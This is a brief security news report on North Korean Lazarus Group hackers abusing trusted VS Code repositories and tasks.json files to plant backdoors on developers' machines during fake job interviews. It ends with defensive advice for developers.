North Korean state-sponsored hackers, identified as the Lazarus Group, have been observed exploiting Microsoft Visual Studio Code (VS Code) in their ongoing "Contagious Interview" campaign. This sophisticated operation targets software developers by masquerading as potential employers to distribute malware.
Malicious Use of Visual Studio Code
In this campaign, attackers create deceptive Git repositories on platforms like GitHub or GitLab, presenting them as legitimate projects. During the interview process, they convince victims to clone and open these repositories using VS Code. Once the repository is opened, VS Code prompts the user to trust the repository author. If the user complies, VS Code automatically processes a `tasks.json` configuration file, executing embedded malicious commands. (itsecuritynews.info)
Malware Deployment and Data Exfiltration
On macOS systems, these commands initiate a background shell that retrieves a JavaScript payload from remote servers, such as Vercel. The payload establishes a persistent loop, harvesting system information—including hostname, MAC addresses, and operating system details—and communicates with a remote command-and-control (C2) server. This backdoor periodically sends system data and receives further malicious instructions. (itsecuritynews.info)
Recommendations for Developers
Security experts advise developers to exercise caution when interacting with third-party repositories, especially those from untrusted sources. Before marking a repository as trusted in VS Code, it's crucial to review its contents thoroughly. Additionally, enabling advanced threat controls and threat prevention measures can help mitigate such attacks. (itsecuritynews.info)
Background on the Contagious Interview Campaign
The "Contagious Interview" campaign has been active since at least November 2023, with North Korean threat actors posing as recruiters to lure software developers into downloading and executing malicious code. This campaign has led to significant cryptocurrency thefts and underscores the evolving tactics of state-sponsored cyber actors. (mofa.go.jp)
For more detailed information on this campaign and protective measures, refer to the official report by Jamf Threat Labs. (itsecuritynews.info)